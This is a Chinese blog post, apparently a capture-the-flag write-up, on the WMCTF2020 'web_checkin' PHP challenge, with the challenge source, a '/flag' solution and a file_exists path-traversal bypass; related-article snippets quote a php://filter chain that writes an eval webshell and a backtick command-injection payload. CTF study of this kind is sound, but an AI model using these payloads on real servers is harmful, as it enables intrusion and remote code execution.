WMCTF2020 web之web_checkin

最新推荐文章于 2023-04-23 20:22:08 发布
最新推荐文章于 2023-04-23 20:22:08 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: ctf 文章标签: php ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/107801049
版权

这道题是自己没有做出来,当时也没有认真做,最后看看来NU1L的wp才知道思路。
NU1L真的太强了,向他们看齐!!!

题目:web_checkin

<?php
//PHP 7.0.33 Apache/2.4.25
error_reporting(0);
$sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);//remote_addr代表客户端的IP
@mkdir($sandbox);//创建一个文件
@chdir($sandbox);//进入这个文件
highlight_file(__FILE__);
if(isset($_GET['content'])) 
{
    $content = $_GET['content'];

    if(preg_match('/iconv|UCS|UTF|rot|quoted|base64/i',$content))//没有弄明白这里是为什么?
         die('hacker');

    if(file_exists($content))//file_exists() 函数检查文件或目录是否存在。
        require_once($content);
        
    file_put_contents($content,'<?php exit();'.$content);
    //file_put_contents() 函数把一个字符串写入文件中。
}

他们是wp就一句话:?content=/flag
难道flag在根目录下面?
于是自己搭建环境测试确实可以获得flag,(使用绝对路径获得,这样可以避免进行修改,但是也应该是没有权限写入吧?)
先放着这里,过几天官方出wp在想一想吧!

想法
结合这个题,我想到了file_exists()函数可能存在绕过,这个例子来源于网络。

<?php
highlight_file(__FILE__);
$file=$_GET['file'];
//file_exists这个函数允许传入的路径中含有特殊符号
if(file_exists($file)){
echo "hacker!!!";
}else{
include($file);
}
?>

//flag.php
<?php
flag{nice_to_meet_u0}

正常输入如果文件存在就会输出hack!!!
使用我们可以构造一个系统没有的文件夹然后…/绕过来绕过。
payload:

?file=./nice/../flag.php

这个思想来自DASCTF7月的比赛
题目链接

Firebasky
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WMCTF2020
qq_42158602的博客
08-14 1042
web web_checkin 源码 <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content
wmctf web部分wp(非官方qwq
shadowwolf’s blog
08-04 1724
web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content'];
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
[WMCTF2020]Web Check in 2.0
qq_62078839的博客
04-16 1511
启动靶机,打开发现源码 string(62) "Sandbox:/var/www/html/sandbox/cc551ab005b2e60fbdc88de809b2c4b1" <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/sandbox/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); var...
WMCTF2020 webweb_checkin完整题解
qq_38338511的博客
03-17 794
这里用的是UCS-2,当然我们也可以用UCS-4 (在这就不多举例了) ,也有常见的办法,base64和strip_tags等等,但是会有弊端。明显过滤了很多,但是我们可以用二次编码绕过,因为file_put_contents中调用伪协议,会对过滤器url解码一次。如何改成自己想要的一句话木马呢?php demo_0.php 运行后会在当前目录生成一个shell.php。首先要解决的是$content要传入什么可以绕过exit()用PHP UCS-2和Rot13编码/解码脚本。改成自己的一句话木马就行了。
buu-day09
anwen12的博客
01-26 514
Day9-懒狗来打卡了 0x01 [WMCTF2020]Web Check in 2.0 绕过死亡exit,这是基本操作了,但是需要找到新的过滤器。懒狗想到这里就去看wp了。 =php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=6.php 还有一种方法是segment,就是那个qwb2021才考过的知识点。需要爆破,就不多说了 0x02 [CISCN2019
HRMS_Employee_checkIn_checkOut
02-09
本系统“HRMS_Employee_checkIn_checkOut”主要关注员工的签到签退功能,其核心技术是利用JavaScript进行前端开发,实现了用户友好的交互界面和实时的数据处理。 JavaScript是一种广泛应用于网页和网络应用的脚本...
glados_checkin
03-25
glados定时签到
checkin:会议签到 Web 应用程序
06-01
会议签到 Web 应用程序刷您的 ID 或输入您的信息以在任何会议上签到。依赖关系目前正在运行 , MySQL数据库Google Drive .NET SDK、Google Sheets .NET SDK、Google OAuth .NET SDK(用于 IEEECheckin.ASPDocs)版本...
checkin_profile_back
04-11
渡槽测试在本地运行应用程序从此目录运行aqueduct serve以运行应用程序。 要在IDE中运行,请运行bin/main.dart 。 默认情况下,将使用名为config.yaml的配置文件。 要生成SwaggerUI客户端,请运行aqueduct document ...
WMCTF_2020官方WriteUp.pdf
03-15
WMCTF_2020官方WriteUp 高清PDF版
daily_checkin.zip
01-07
【标题】"daily_checkin.zip" 是一个包含脚本的压缩包,用于自动完成天翼云的每日签到任务,并且据描述在2022年1月7日时已经经过了测试,证明是可用的。这个压缩包可能对那些需要定期在天翼云平台签到并领取额外存储...
PHP Filter伪协议Trick总结
gental_z的博客
01-04 8406
PHP Filter伪协议Trick总结 前言:最近在学习的过程中碰到了很多的filter协议的小trick,在此做一个总结以及对filter协议的一些探索。 PHP Filter协议介绍 ​ php://filter是php中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。官方解释为: php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这
2020WMCTF cfgo_CheckIn题解
starssgo的博客
08-03 981
周六周日刚打了打,战队里一共出了两道题。分别是cfgo_CheckIn跟mengyedekending。我的话是一直在做cfgo_CheckIn,mengyedekending由战队里的whalien51冲出来的。我暂时没有复现。就先写下这个cfgo_CheckIn的wp 详细解释的话放到我的博客站上 不太明白的湿傅们可以去我的博客上看下具体实现 思路 编写破解迷宫算法,然后栈溢出就行了。 # -*- coding: utf-8 -* from pwn import * from LibcSearcher
BUUCTF_web_checkln
vegetable_haker的博客
10-11 812
BUUCTF_web_checkln方法步骤 方法 利用.user.ini隐藏后门。配置项auto_prepend_file 会让php文件在执行前先包含一个指定的文件,通过这个配置项,我们就可以来隐藏自己的后门 步骤 1.新建文件.user.ini,写入 GIF89a //绕过exif_imagetype() auto_prepend_file=test.jpg...
4 web wp
TMNOA的博客
04-23 126
流年似水
ctfshow 大牛杯web
羽的博客
05-03 9673
文章目录web_checkineasy_unserializeeasy_cms web_checkin 输入 ?code=?><?=`nl%09*` 得到源码 很明显是想让我们条件竞争。 生成文件 ?code=`nl%09/*>b` 开始竞争 import requests import threading import sys session=requests.session() url1="http://ba2bd9c4-6f58-45a1-a637-3cf0140e89c1.c
[GKCTF2020] web题-CheckIN
BROTHERYY的博客
07-29 563
复现环境:buuoj.cn 代码提示有eval函数可以执行base64加密代码 成功回显了phpinfo信息 编辑一句话上传 eval($_POST[1]); 根目录上有flag和readflag,但都没法访问,应该是权限不够 bypass disable_functions 该漏洞可以执行命令执行 exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 上传到有权限的目录/tmp ?Ginkg
SELECT a.* FROM jg_bed a,jg_pay_info b,jg_checkin_bed c WHERE a."id" = c.bed_id and b.checkin_id = c.checkin_id AND BETWEEN b.checkout_date = '2023-05-06' and b.checkout_date ='2023-06-07'; 这个语法有什么错误
最新发布
06-09
这个 SQL 查询语句中缺少了一个关键字,应该使用 BETWEEN ... AND ... 的语法。正确的语法应该是: SELECT a.* FROM jg_bed a, jg_pay_info b, jg_checkin_bed c WHERE a.id = c.bed_id AND b.checkin_id = c.checkin_id AND b.checkout_date BETWEEN '2023-05-06' AND '2023-06-07'; 注意,以上语句中我并没有透露您的任何要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值